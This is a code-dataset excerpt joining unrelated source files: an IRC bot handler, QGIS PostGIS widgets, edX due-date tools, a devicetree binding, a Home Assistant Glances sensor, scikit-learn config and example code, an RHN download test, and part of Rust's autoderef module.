if not acceptable_netloc(urlparse.urlparse(url).netloc):
continue
if self._misses.fetch(url):
log.info((f"Skipped title check for URL {url} because of "
"previous failures"))
continue
title = self._hits.fetch(url)
if title is None:
log.info(f"Cache miss for URL {url}")
handler = self._URL_HANDLER_CLASS(
max_body=2 * 1024 ** 2, parser_class=lxml.html.HTMLParser)
try:
title = await handler.get_title(url)
except Exception:
self.fail(url)
else:
if len(title) > self._max_len:
title = title[:self._max_len]
if title:
self._hits.update(url, title)
await self.success(title, url)
else:
log.info(f"Cache hit for URL {url}")
await self.success(title, url)
class UrlCache(object):
def __init__(self, reactor, expiration=60):
self._reactor = reactor
self._expiration = expiration
self._db = {}
self._reaper = task.LoopingCall(self._reap)
self._reaper.clock = reactor
def fetch(self, key):
try:
value = self._db[key]["value"]
except KeyError:
value = None
return value
def update(self, key, value):
self._db[key] = {"value": value,
"timestamp": self._reactor.seconds()}
def _valid(self):
for key, value in self._db.items():
if self._reactor.seconds() - value["timestamp"] < self._expiration:
yield key, value
def enable(self):
if not self._reaper.running:
self._reaper.start(self._expiration, False)
def disable(self):
if self._reaper.running:
self._reaper.stop()
def _reap(self):
self._db = dict(self._valid())
class API(pb.Referenceable):
STALENESS_LIMIT = 24*60*60
def __init__(self, reactor):
self.reactor = reactor
self.good_urls = UrlCache(self.reactor, expiration=3600)
self.good_urls.enable()
self.bad_urls = UrlCache(self.reactor, expiration=60)
self.bad_urls.enable()
def _staleness_check(self, timestamp):
if self.reactor.seconds() - timestamp > self.STALENESS_LIMIT:
log.info("Message stale, ignoring")
return True
else:
return False
def remote_handlePublicMessage(self, protocol, user, channel, message,
max_line_length, timestamp):
if self._staleness_check(timestamp):
return
try:
callback = functools.partial(
protocol.callRemote, "msg", channel)
roles = resolveRoles(user)
if "ignored" in roles:
return
if message.startswith("!"):
return handleCommand(protocol, user, roles, channel, message[1:],
max_line_length, callback)
else:
handler = MessageHandler(self.reactor, self.good_urls,
self.bad_urls, callback,
max_line_length)
return defer.ensureDeferred(handler.find_links(message))
except Exception:
log.failure("FIXME, runaway exception")
def remote_handlePrivateMessage(self, protocol, user, channel, message,
max_line_length, timestamp):
if self._staleness_check(timestamp):
return
channel, _, _ = user.partition("!")
return self.remote_handlePublicMessage(protocol, user, channel,
message,
max_line_length,
timestamp)
user_query = ("select roles.name from roles where roles.oid in "
"(select userroles.oid from (users natural join usermask)"
"natural join userroles where usermask.mask=?);")
def resolveRoles(user):
with sqlite3.connect(config["core"]["db"]) as conn:
cur = conn.cursor()
res = cur.execute(user_query, (user,))
return [role[0] for role in res.fetchmany()]
def handleCommand(protocol, user, roles, channel, message, max_line_length,
callback):
command, _, suffix = message.partition(" ")
if command == "reincarnate":
if "superadmin" in roles:
log.info("Restarting app")
reactor.stop()
else:
log.info("User {user} tried to do code reload", user=user)
elif command == "eval":
truth, expr = suffix.split(":")
truth = [s.strip() for s in truth.split(",")]
try:
ret = simple_eval.eval_bool(expr, truth)
except simple_eval.EvalError as e:
callback(str(e))
else:
callback("Result: %s" % ret)
elif command == "join":
channel, _, password = suffix.partition(" ")
if not password:
password = None
if "superadmin" in roles:
if password:
log.info(f"Joining {channel} ({password})")
else:
log.info(f"Joining {channel}")
return protocol.callRemote("join", channel, password)
elif command == "leave":
channel, _, reason = suffix.partition(" ")
if not reason:
reason = None
if "superadmin" in roles:
if reason:
log.info("Leaving {channel} ({reason})",
channel=channel, reason=reason)
else:
log.info(f"Leaving {channel}")
return protocol.callRemote("leave", channel, reason)
else:
log.info(f"Unrecognized command {command}")
def log_and_exit(ret, reactor):
log.failure("Critical failure, terminating application")
reactor.stop()
def register(root, reactor):
log.info("Registering app for bot")
return root.callRemote("register", API(reactor))
if __name__ == "__main__":
from twisted.internet import reactor
with open(environ["CONFIG"]) as f:
config.update(json.load(f))
f = open(config["core"]["log_file"], "a")
globalLogPublisher.addObserver(textFileLogObserver(f))
endpoint = endpoints.StandardIOEndpoint(reactor)
factory = pb.PBClientFactory()
d = endpoint.listen(factory)
@d.addCallback
def initialize(_):
d = factory.getRootObject()
d.addCallback(register, reactor)
d.addErrback(log_and_exit, reactor)
return
reactor.run() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
"""
***************************************************************************
postgis.py - Postgis widget wrappers
---------------------
Date : December 2016
Copyright : (C) 2016 by Arnaud Morvan
Email : arnaud dot morvan at camptocamp dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from qgis.core import (QgsSettings,
QgsProcessingParameterNumber,
QgsProcessingParameterFile,
QgsProcessingParameterField,
QgsProcessingParameterExpression,
QgsProcessingOutputString,
QgsProcessingParameterString)
from qgis.PyQt.QtWidgets import QComboBox
from processing.gui.wrappers import (
WidgetWrapper,
DIALOG_MODELER,
)
from processing.tools.postgis import GeoDB
class ConnectionWidgetWrapper(WidgetWrapper):
"""
WidgetWrapper for ParameterString that create and manage a combobox widget
with existing postgis connections.
"""
def createWidget(self):
self._combo = QComboBox()
for group in self.items():
self._combo.addItem(*group)
self._combo.currentIndexChanged.connect(lambda: self.widgetValueHasChanged.emit(self))
return self._combo
def items(self):
settings = QgsSettings()
settings.beginGroup('/PostgreSQL/connections/')
items = [(group, group) for group in settings.childGroups()]
if self.dialogType == DIALOG_MODELER:
strings = self.dialog.getAvailableValuesOfType(
[QgsProcessingParameterString, QgsProcessingParameterNumber, QgsProcessingParameterFile,
QgsProcessingParameterField, QgsProcessingParameterExpression], QgsProcessingOutputString)
items = items + [(self.dialog.resolveValueDescription(s), s) for s in strings]
return items
def setValue(self, value):
self.setComboValue(value, self._combo)
def value(self):
return self.comboValue(combobox=self._combo)
class SchemaWidgetWrapper(WidgetWrapper):
"""
WidgetWrapper for ParameterString that create and manage a combobox widget
with existing schemas from a parent connection parameter.
"""
def createWidget(self, connection_param=None):
self._connection_param = connection_param
self._connection = None
self._database = None
self._combo = QComboBox()
self._combo.setEditable(True)
self.refreshItems()
self._combo.currentIndexChanged.connect(lambda: self.widgetValueHasChanged.emit(self))
self._combo.lineEdit().editingFinished.connect(lambda: self.widgetValueHasChanged.emit(self))
return self._combo
def postInitialize(self, wrappers):
for wrapper in wrappers:
if wrapper.parameterDefinition().name() == self._connection_param:
self.connection_wrapper = wrapper
self.setConnection(wrapper.parameterValue())
wrapper.widgetValueHasChanged.connect(self.connectionChanged)
break
def connectionChanged(self, wrapper):
connection = wrapper.parameterValue()
if connection == self._connection:
return
self.setConnection(connection)
def setConnection(self, connection):
self._connection = connection
# when there is NO connection (yet), this get's called with a ''-connection
if isinstance(connection, str) and connection != '':
self._database = GeoDB.from_name(connection)
else:
self._database = None
self.refreshItems()
self.widgetValueHasChanged.emit(self)
def refreshItems(self):
value = self.comboValue(combobox=self._combo)
self._combo.clear()
if self._database is not None:
for schema in self._database.list_schemas():
self._combo.addItem(schema[1], schema[1])
if self.dialogType == DIALOG_MODELER:
strings = self.dialog.getAvailableValuesOfType(
[QgsProcessingParameterString, QgsProcessingParameterNumber, QgsProcessingParameterFile,
QgsProcessingParameterField, QgsProcessingParameterExpression], QgsProcessingOutputString)
for text, data in [(self.dialog.resolveValueDescription(s), s) for s in strings]:
self._combo.addItem(text, data)
self.setComboValue(value, self._combo)
def setValue(self, value):
self.setComboValue(value, self._combo)
self.widgetValueHasChanged.emit(self)
def value(self):
return self.comboValue(combobox=self._combo)
def database(self):
return self._database
class TableWidgetWrapper(WidgetWrapper):
"""
WidgetWrapper for ParameterString that create and manage a combobox widget
with existing tables from a parent schema parameter.
"""
def createWidget(self, schema_param=None):
self._schema_param = schema_param
self._database = None
self._schema = None
self._combo = QComboBox()
self._combo.setEditable(True)
self.refreshItems()
self._combo.currentIndexChanged.connect(lambda: self.widgetValueHasChanged.emit(self))
self._combo.lineEdit().editingFinished.connect(lambda: self.widgetValueHasChanged.emit(self))
return self._combo
def postInitialize(self, wrappers):
for wrapper in wrappers:
if wrapper.parameterDefinition().name() == self._schema_param:
self.schema_wrapper = wrapper
self.setSchema(wrapper.database(), wrapper.parameterValue())
wrapper.widgetValueHasChanged.connect(self.schemaChanged)
break
def schemaChanged(self, wrapper):
database = wrapper.database()
schema = wrapper.parameterValue()
if database == self._database and schema == self._schema:
return
self.setSchema(database, schema)
def setSchema(self, database, schema):
self._database = database
self._schema = schema
self.refreshItems()
self.widgetValueHasChanged.emit(self)
def refreshItems(self):
value = self.comboValue(combobox=self._combo)
self._combo.clear()
if (self._database is not None and isinstance(self._schema, str)):
for table in self._database.list_geotables(self._schema):
self._combo.addItem(table[0], table[0])
if self.dialogType == DIALOG_MODELER:
strings = self.dialog.getAvailableValuesOfType(
[QgsProcessingParameterString, QgsProcessingParameterNumber, QgsProcessingParameterFile,
QgsProcessingParameterField, QgsProcessingParameterExpression], QgsProcessingOutputString)
for text, data in [(self.dialog.resolveValueDescription(s), s) for s in strings]:
self._combo.addItem(text, data)
self.setComboValue(value, self._combo)
def setValue(self, value):
self.setComboValue(value, self._combo)
self.widgetValueHasChanged.emit(self)
def value(self):
return self.comboValue(combobox=self._combo) | unknown | codeparrot/codeparrot-clean | ||
"""
Tools for the instructor dashboard
"""
import json
import dateutil
from django.contrib.auth.models import User
from django.http import HttpResponseBadRequest
from pytz import UTC
from django.utils.translation import ugettext as _
from opaque_keys.edx.keys import UsageKey
from six import text_type
from courseware.field_overrides import disable_overrides
from courseware.models import StudentFieldOverride
from courseware.student_field_overrides import clear_override_for_user, get_override_for_user, override_field_for_user
from xmodule.fields import Date
DATE_FIELD = Date()
class DashboardError(Exception):
"""
Errors arising from use of the instructor dashboard.
"""
def response(self):
"""
Generate an instance of HttpResponseBadRequest for this error.
"""
error = unicode(self)
return HttpResponseBadRequest(json.dumps({'error': error}))
def handle_dashboard_error(view):
"""
Decorator which adds seamless DashboardError handling to a view. If a
DashboardError is raised during view processing, an HttpResponseBadRequest
is sent back to the client with JSON data about the error.
"""
def wrapper(request, course_id):
"""
Wrap the view.
"""
try:
return view(request, course_id=course_id)
except DashboardError, error:
return error.response()
return wrapper
def strip_if_string(value):
if isinstance(value, basestring):
return value.strip()
return value
def get_student_from_identifier(unique_student_identifier):
"""
Gets a student object using either an email address or username.
Returns the student object associated with `unique_student_identifier`
Raises User.DoesNotExist if no user object can be found.
"""
unique_student_identifier = strip_if_string(unique_student_identifier)
if "@" in unique_student_identifier:
student = User.objects.get(email=unique_student_identifier)
else:
student = User.objects.get(username=unique_student_identifier)
return student
def require_student_from_identifier(unique_student_identifier):
"""
Same as get_student_from_identifier() but will raise a DashboardError if
the student does not exist.
"""
try:
return get_student_from_identifier(unique_student_identifier)
except User.DoesNotExist:
raise DashboardError(
_("Could not find student matching identifier: {student_identifier}").format(
student_identifier=unique_student_identifier
)
)
def parse_datetime(datestr):
"""
Convert user input date string into an instance of `datetime.datetime` in
UTC.
"""
try:
return dateutil.parser.parse(datestr).replace(tzinfo=UTC)
except ValueError:
raise DashboardError(_("Unable to parse date: ") + datestr)
def find_unit(course, url):
"""
Finds the unit (block, module, whatever the terminology is) with the given
url in the course tree and returns the unit. Raises DashboardError if no
unit is found.
"""
def find(node, url):
"""
Find node in course tree for url.
"""
if text_type(node.location) == url:
return node
for child in node.get_children():
found = find(child, url)
if found:
return found
return None
unit = find(course, url)
if unit is None:
raise DashboardError(_("Couldn't find module for url: {0}").format(url))
return unit
def get_units_with_due_date(course):
"""
Returns all top level units which have due dates. Does not return
descendents of those nodes.
"""
units = []
def visit(node):
"""
Visit a node. Checks to see if node has a due date and appends to
`units` if it does. Otherwise recurses into children to search for
nodes with due dates.
"""
if getattr(node, 'due', None):
units.append(node)
else:
for child in node.get_children():
visit(child)
visit(course)
#units.sort(key=_title_or_url)
return units
def title_or_url(node):
"""
Returns the `display_name` attribute of the passed in node of the course
tree, if it has one. Otherwise returns the node's url.
"""
title = getattr(node, 'display_name', None)
if not title:
title = text_type(node.location)
return title
def set_due_date_extension(course, unit, student, due_date):
"""
Sets a due date extension. Raises DashboardError if the unit or extended
due date is invalid.
"""
if due_date:
# Check that the new due date is valid:
with disable_overrides():
original_due_date = getattr(unit, 'due', None)
if not original_due_date:
raise DashboardError(_("Unit {0} has no due date to extend.").format(unit.location))
if due_date < original_due_date:
raise DashboardError(_("An extended due date must be later than the original due date."))
override_field_for_user(student, unit, 'due', due_date)
else:
# We are deleting a due date extension. Check that it exists:
if not get_override_for_user(student, unit, 'due'):
raise DashboardError(_("No due date extension is set for that student and unit."))
clear_override_for_user(student, unit, 'due')
def dump_module_extensions(course, unit):
"""
Dumps data about students with due date extensions for a particular module,
specified by 'url', in a particular course.
"""
data = []
header = [_("Username"), _("Full Name"), _("Extended Due Date")]
query = StudentFieldOverride.objects.filter(
course_id=course.id,
location=unit.location,
field='due')
for override in query:
due = DATE_FIELD.from_json(json.loads(override.value))
due = due.strftime("%Y-%m-%d %H:%M")
fullname = override.student.profile.name
data.append(dict(zip(
header,
(override.student.username, fullname, due))))
data.sort(key=lambda x: x[header[0]])
return {
"header": header,
"title": _("Users with due date extensions for {0}").format(
title_or_url(unit)),
"data": data
}
def dump_student_extensions(course, student):
"""
Dumps data about the due date extensions granted for a particular student
in a particular course.
"""
data = []
header = [_("Unit"), _("Extended Due Date")]
units = get_units_with_due_date(course)
units = {u.location: u for u in units}
query = StudentFieldOverride.objects.filter(
course_id=course.id,
student=student,
field='due')
for override in query:
location = override.location.replace(course_key=course.id)
if location not in units:
continue
due = DATE_FIELD.from_json(json.loads(override.value))
due = due.strftime("%Y-%m-%d %H:%M")
title = title_or_url(units[location])
data.append(dict(zip(header, (title, due))))
return {
"header": header,
"title": _("Due date extensions for {0} {1} ({2})").format(
student.first_name, student.last_name, student.username),
"data": data}
def add_block_ids(payload):
"""
rather than manually parsing block_ids from module_ids on the client, pass the block_ids explicitly in the payload
"""
if 'data' in payload:
for ele in payload['data']:
if 'module_id' in ele:
ele['block_id'] = UsageKey.from_string(ele['module_id']).block_id | unknown | codeparrot/codeparrot-clean | ||
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/dma/marvell,orion-xor.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Marvell XOR engine
maintainers:
- Andrew Lunn <andrew@lunn.ch>
- Gregory Clement <gregory.clement@bootlin.com>
properties:
compatible:
oneOf:
- items:
- const: marvell,armada-380-xor
- const: marvell,orion-xor
- enum:
- marvell,armada-3700-xor
- marvell,orion-xor
reg:
items:
- description: Low registers for the XOR engine
- description: High registers for the XOR engine
clocks:
maxItems: 1
patternProperties:
"^(channel|xor)[0-9]+$":
description: XOR channel sub-node
type: object
additionalProperties: false
properties:
interrupts:
description: Interrupt specifier for the XOR channel
items:
- description: Interrupt for this channel
dmacap,memcpy:
type: boolean
deprecated: true
description:
Indicates that the XOR channel is capable of memcpy operations
dmacap,memset:
type: boolean
deprecated: true
description:
Indicates that the XOR channel is capable of memset operations
dmacap,xor:
type: boolean
deprecated: true
description:
Indicates that the XOR channel is capable of xor operations
required:
- interrupts
required:
- compatible
- reg
additionalProperties: false
examples:
- |
xor@d0060900 {
compatible = "marvell,orion-xor";
reg = <0xd0060900 0x100>,
<0xd0060b00 0x100>;
clocks = <&coreclk 0>;
xor00 {
interrupts = <51>;
};
xor01 {
interrupts = <52>;
};
}; | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/dma/marvell,orion-xor.yaml |
"""
Support gathering system information of hosts which are running glances.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.glances/
"""
import logging
from datetime import timedelta
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST, CONF_PORT, CONF_NAME, CONF_RESOURCES, TEMP_CELSIUS)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
_RESOURCE = 'api/2/all'
DEFAULT_HOST = 'localhost'
DEFAULT_NAME = 'Glances'
DEFAULT_PORT = '61208'
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=1)
SENSOR_TYPES = {
'disk_use_percent': ['Disk used', '%', 'mdi:harddisk'],
'disk_use': ['Disk used', 'GiB', 'mdi:harddisk'],
'disk_free': ['Disk free', 'GiB', 'mdi:harddisk'],
'memory_use_percent': ['RAM used', '%', 'mdi:memory'],
'memory_use': ['RAM used', 'MiB', 'mdi:memory'],
'memory_free': ['RAM free', 'MiB', 'mdi:memory'],
'swap_use_percent': ['Swap used', '%', 'mdi:memory'],
'swap_use': ['Swap used', 'GiB', 'mdi:memory'],
'swap_free': ['Swap free', 'GiB', 'mdi:memory'],
'processor_load': ['CPU load', '15 min', 'mdi:memory'],
'process_running': ['Running', 'Count', 'mdi:memory'],
'process_total': ['Total', 'Count', 'mdi:memory'],
'process_thread': ['Thread', 'Count', 'mdi:memory'],
'process_sleeping': ['Sleeping', 'Count', 'mdi:memory'],
'cpu_temp': ['CPU Temp', TEMP_CELSIUS, 'mdi:thermometer'],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_RESOURCES, default=['disk_use']):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
})
# pylint: disable=unused-variable
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Glances sensor."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
port = config.get(CONF_PORT)
url = 'http://{}:{}/{}'.format(host, port, _RESOURCE)
var_conf = config.get(CONF_RESOURCES)
rest = GlancesData(url)
rest.update()
dev = []
for resource in var_conf:
dev.append(GlancesSensor(rest, name, resource))
add_devices(dev, True)
class GlancesSensor(Entity):
"""Implementation of a Glances sensor."""
def __init__(self, rest, name, sensor_type):
"""Initialize the sensor."""
self.rest = rest
self._name = name
self.type = sensor_type
self._state = None
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self._name, SENSOR_TYPES[self.type][0])
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return SENSOR_TYPES[self.type][2]
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return self._unit_of_measurement
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self.rest.data is not None
@property
def state(self):
"""Return the state of the resources."""
return self._state
def update(self):
"""Get the latest data from REST API."""
self.rest.update()
value = self.rest.data
if value is not None:
if self.type == 'disk_use_percent':
self._state = value['fs'][0]['percent']
elif self.type == 'disk_use':
self._state = round(value['fs'][0]['used'] / 1024**3, 1)
elif self.type == 'disk_free':
try:
self._state = round(value['fs'][0]['free'] / 1024**3, 1)
except KeyError:
self._state = round((value['fs'][0]['size'] -
value['fs'][0]['used']) / 1024**3, 1)
elif self.type == 'memory_use_percent':
self._state = value['mem']['percent']
elif self.type == 'memory_use':
self._state = round(value['mem']['used'] / 1024**2, 1)
elif self.type == 'memory_free':
self._state = round(value['mem']['free'] / 1024**2, 1)
elif self.type == 'swap_use_percent':
self._state = value['memswap']['percent']
elif self.type == 'swap_use':
self._state = round(value['memswap']['used'] / 1024**3, 1)
elif self.type == 'swap_free':
self._state = round(value['memswap']['free'] / 1024**3, 1)
elif self.type == 'processor_load':
# Windows systems don't provide load details
try:
self._state = value['load']['min15']
except KeyError:
self._state = value['cpu']['total']
elif self.type == 'process_running':
self._state = value['processcount']['running']
elif self.type == 'process_total':
self._state = value['processcount']['total']
elif self.type == 'process_thread':
self._state = value['processcount']['thread']
elif self.type == 'process_sleeping':
self._state = value['processcount']['sleeping']
elif self.type == 'cpu_temp':
for sensor in value['sensors']:
if sensor['label'] == 'CPU':
self._state = sensor['value']
self._state = None
class GlancesData(object):
"""The class for handling the data retrieval."""
def __init__(self, resource):
"""Initialize the data object."""
self._resource = resource
self.data = {}
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Get the latest data from the Glances REST API."""
try:
response = requests.get(self._resource, timeout=10)
self.data = response.json()
except requests.exceptions.ConnectionError:
_LOGGER.error("Connection error: %s", self._resource)
self.data = None | unknown | codeparrot/codeparrot-clean | ||
{
// "regular": Bencharks are run on small to medium datasets. Each benchmark
// is run multiple times and averaged.
// "fast": Benchmarks are run on small to medium datasets. Each benchmark
// is run only once. May provide unstable benchmarks.
// "large_scale": Benchmarks are run on large datasets. Each benchmark is
// run multiple times and averaged. This profile is meant to
// benchmark scalability and will take hours on single core.
// Can be overridden by environment variable SKLBENCH_PROFILE.
"profile": "regular",
// List of values of n_jobs to use for estimators which accept this
// parameter (-1 means all cores). An empty list means all values from 1 to
// the maximum number of available cores.
// Can be overridden by environment variable SKLBENCH_NJOBS.
"n_jobs_vals": [1],
// If true, fitted estimators are saved in ./cache/estimators/<commit hash>
// Can be overridden by environment variable SKLBENCH_SAVE_ESTIMATORS.
"save_estimators": false,
// Commit hash to compare estimator predictions with.
// If null, predictions are not compared.
// Can be overridden by environment variable SKLBENCH_BASE_COMMIT.
"base_commit": null,
// If false, the predict (resp. transform) method of the estimators won't
// be benchmarked.
// Can be overridden by environment variables SKLBENCH_PREDICT and
// SKLBENCH_TRANSFORM.
"bench_predict": true,
"bench_transform": true
} | json | github | https://github.com/scikit-learn/scikit-learn | asv_benchmarks/benchmarks/config.json |
#!/usr/bin/python
#
#
#
import sys
sys.path.append('..')
from rhn.rpclib import Server, GETServer
SERVER = "http://xmlrpc.rhn.redhat.com/XMLRPC"
system_id_file = "/etc/sysconfig/rhn/systemid"
try:
SERVER = "http://%s/XMLRPC" % sys.argv[1]
system_id_file = sys.argv[2]
except:
pass
print "SERVER = %s" % SERVER
print "system_id_file = %s" % system_id_file
def refreshCallback(*args, **kwargs):
print "Called refreshCallback, args %s, kwargs %s" % (args, kwargs)
def progressCallback(*args, **kwargs):
print "Called progressCallback, args %s, kwargs %s" % (args, kwargs)
if __name__ == '__main__':
sysid = open(system_id_file).read()
s = Server(SERVER)
s.set_refresh_callback(refreshCallback)
s.set_progress_callback(progressCallback)
dict = s.up2date.login(sysid)
gs = GETServer(SERVER, headers=dict)
gs.set_refresh_callback(refreshCallback)
gs.set_progress_callback(progressCallback, 16384)
channels = dict['X-RHN-Auth-Channels']
cn, cv = channels[0][:2]
print "Calling listPackages"
l = gs.listPackages(cn, cv)
for p in l:
if p[0] == 'kernel':
package = p
break
else:
raise Exception("Package not found")
print "PACKAGE TO DOWNLOAD: %s %s %s %s" % (package[0], package[1], package[2], package[4])
filename = "%s-%s-%s.%s.rpm" % (package[0], package[1], package[2], package[4])
print "Calling getPackages"
fd = gs.getPackage(cn, filename)
data_name = "/tmp/foobar"
data = open(data_name, "w+").write(fd.read())
print "PACKAGE DOWNLOADED AS: %s" % data_name | unknown | codeparrot/codeparrot-clean | ||
"""
=======================================================================
Shrinkage covariance estimation: LedoitWolf vs OAS and max-likelihood
=======================================================================
When working with covariance estimation, the usual approach is to use
a maximum likelihood estimator, such as the
:class:`~sklearn.covariance.EmpiricalCovariance`. It is unbiased, i.e. it
converges to the true (population) covariance when given many
observations. However, it can also be beneficial to regularize it, in
order to reduce its variance; this, in turn, introduces some bias. This
example illustrates the simple regularization used in
:ref:`shrunk_covariance` estimators. In particular, it focuses on how to
set the amount of regularization, i.e. how to choose the bias-variance
trade-off.
.. rubric:: References
.. [1] "Shrinkage Algorithms for MMSE Covariance Estimation"
Chen et al., IEEE Trans. on Sign. Proc., Volume 58, Issue 10, October 2010.
"""
# Authors: The scikit-learn developers
# SPDX-License-Identifier: BSD-3-Clause
# %%
# Generate sample data
# --------------------
import numpy as np
n_features, n_samples = 40, 20
np.random.seed(42)
base_X_train = np.random.normal(size=(n_samples, n_features))
base_X_test = np.random.normal(size=(n_samples, n_features))
# Color samples
coloring_matrix = np.random.normal(size=(n_features, n_features))
X_train = np.dot(base_X_train, coloring_matrix)
X_test = np.dot(base_X_test, coloring_matrix)
# %%
# Compute the likelihood on test data
# -----------------------------------
from scipy import linalg
from sklearn.covariance import ShrunkCovariance, empirical_covariance, log_likelihood
# spanning a range of possible shrinkage coefficient values
shrinkages = np.logspace(-2, 0, 30)
negative_logliks = [
-ShrunkCovariance(shrinkage=s).fit(X_train).score(X_test) for s in shrinkages
]
# under the ground-truth model, which we would not have access to in real
# settings
real_cov = np.dot(coloring_matrix.T, coloring_matrix)
emp_cov = empirical_covariance(X_train)
loglik_real = -log_likelihood(emp_cov, linalg.inv(real_cov))
# %%
# Compare different approaches to setting the regularization parameter
# --------------------------------------------------------------------
#
# Here we compare 3 approaches:
#
# * Setting the parameter by cross-validating the likelihood on three folds
# according to a grid of potential shrinkage parameters.
#
# * A close formula proposed by Ledoit and Wolf to compute
# the asymptotically optimal regularization parameter (minimizing an MSE
# criterion), yielding the :class:`~sklearn.covariance.LedoitWolf`
# covariance estimate.
#
# * An improvement of the Ledoit-Wolf shrinkage, the
# :class:`~sklearn.covariance.OAS`, proposed by Chen et al. [1]_. Its
# convergence is significantly better under the assumption that the data
# are Gaussian, in particular for small samples.
from sklearn.covariance import OAS, LedoitWolf
from sklearn.model_selection import GridSearchCV
# GridSearch for an optimal shrinkage coefficient
tuned_parameters = [{"shrinkage": shrinkages}]
cv = GridSearchCV(ShrunkCovariance(), tuned_parameters)
cv.fit(X_train)
# Ledoit-Wolf optimal shrinkage coefficient estimate
lw = LedoitWolf()
loglik_lw = lw.fit(X_train).score(X_test)
# OAS coefficient estimate
oa = OAS()
loglik_oa = oa.fit(X_train).score(X_test)
# %%
# Plot results
# ------------
#
#
# To quantify estimation error, we plot the likelihood of unseen data for
# different values of the shrinkage parameter. We also show the choices by
# cross-validation, or with the LedoitWolf and OAS estimates.
import matplotlib.pyplot as plt
fig = plt.figure()
plt.title("Regularized covariance: likelihood and shrinkage coefficient")
plt.xlabel("Regularization parameter: shrinkage coefficient")
plt.ylabel("Error: negative log-likelihood on test data")
# range shrinkage curve
plt.loglog(shrinkages, negative_logliks, label="Negative log-likelihood")
plt.plot(plt.xlim(), 2 * [loglik_real], "--r", label="Real covariance likelihood")
# adjust view
lik_max = np.amax(negative_logliks)
lik_min = np.amin(negative_logliks)
ymin = lik_min - 6.0 * np.log((plt.ylim()[1] - plt.ylim()[0]))
ymax = lik_max + 10.0 * np.log(lik_max - lik_min)
xmin = shrinkages[0]
xmax = shrinkages[-1]
# LW likelihood
plt.vlines(
lw.shrinkage_,
ymin,
-loglik_lw,
color="magenta",
linewidth=3,
label="Ledoit-Wolf estimate",
)
# OAS likelihood
plt.vlines(
oa.shrinkage_, ymin, -loglik_oa, color="purple", linewidth=3, label="OAS estimate"
)
# best CV estimator likelihood
plt.vlines(
cv.best_estimator_.shrinkage,
ymin,
-cv.best_estimator_.score(X_test),
color="cyan",
linewidth=3,
label="Cross-validation best estimate",
)
plt.ylim(ymin, ymax)
plt.xlim(xmin, xmax)
plt.legend()
plt.show()
# %%
# .. note::
#
# The maximum likelihood estimate corresponds to no shrinkage,
# and thus performs poorly. The Ledoit-Wolf estimate performs really well,
# as it is close to the optimal and is not computationally costly. In this
# example, the OAS estimate is a bit further away. Interestingly, both
# approaches outperform cross-validation, which is significantly most
# computationally costly. | python | github | https://github.com/scikit-learn/scikit-learn | examples/covariance/plot_covariance_estimation.py |
use rustc_hir::limit::Limit;
use rustc_infer::infer::InferCtxt;
use rustc_infer::traits::PredicateObligations;
use rustc_middle::ty::{self, Ty, TyCtxt, TypeVisitableExt};
use rustc_span::def_id::{LOCAL_CRATE, LocalDefId};
use rustc_span::{ErrorGuaranteed, Span};
use rustc_trait_selection::traits::ObligationCtxt;
use tracing::{debug, instrument};
use crate::errors::AutoDerefReachedRecursionLimit;
use crate::traits;
use crate::traits::query::evaluate_obligation::InferCtxtExt;
#[derive(Copy, Clone, Debug)]
pub enum AutoderefKind {
/// A true pointer type, such as `&T` and `*mut T`.
Builtin,
/// A type which must dispatch to a `Deref` implementation.
Overloaded,
}
struct AutoderefSnapshot<'tcx> {
at_start: bool,
reached_recursion_limit: bool,
steps: Vec<(Ty<'tcx>, AutoderefKind)>,
cur_ty: Ty<'tcx>,
obligations: PredicateObligations<'tcx>,
}
/// Recursively dereference a type, considering both built-in
/// dereferences (`*`) and the `Deref` trait.
/// Although called `Autoderef` it can be configured to use the
/// `Receiver` trait instead of the `Deref` trait.
pub struct Autoderef<'a, 'tcx> {
// Meta infos:
infcx: &'a InferCtxt<'tcx>,
span: Span,
body_id: LocalDefId,
param_env: ty::ParamEnv<'tcx>,
// Current state:
state: AutoderefSnapshot<'tcx>,
// Configurations:
include_raw_pointers: bool,
use_receiver_trait: bool,
silence_errors: bool,
}
impl<'a, 'tcx> Iterator for Autoderef<'a, 'tcx> {
type Item = (Ty<'tcx>, usize);
fn next(&mut self) -> Option<Self::Item> {
let tcx = self.infcx.tcx;
debug!("autoderef: steps={:?}, cur_ty={:?}", self.state.steps, self.state.cur_ty);
if self.state.at_start {
self.state.at_start = false;
debug!("autoderef stage #0 is {:?}", self.state.cur_ty);
return Some((self.state.cur_ty, 0));
}
// If we have reached the recursion limit, error gracefully.
if !tcx.recursion_limit().value_within_limit(self.state.steps.len()) {
if !self.silence_errors {
report_autoderef_recursion_limit_error(tcx, self.span, self.state.cur_ty);
}
self.state.reached_recursion_limit = true;
return None;
}
// We want to support method and function calls for `impl Deref<Target = ..>`.
//
// To do so we don't eagerly bail if the current type is the hidden type of an
// opaque type and instead return `None` in `fn overloaded_deref_ty` if the
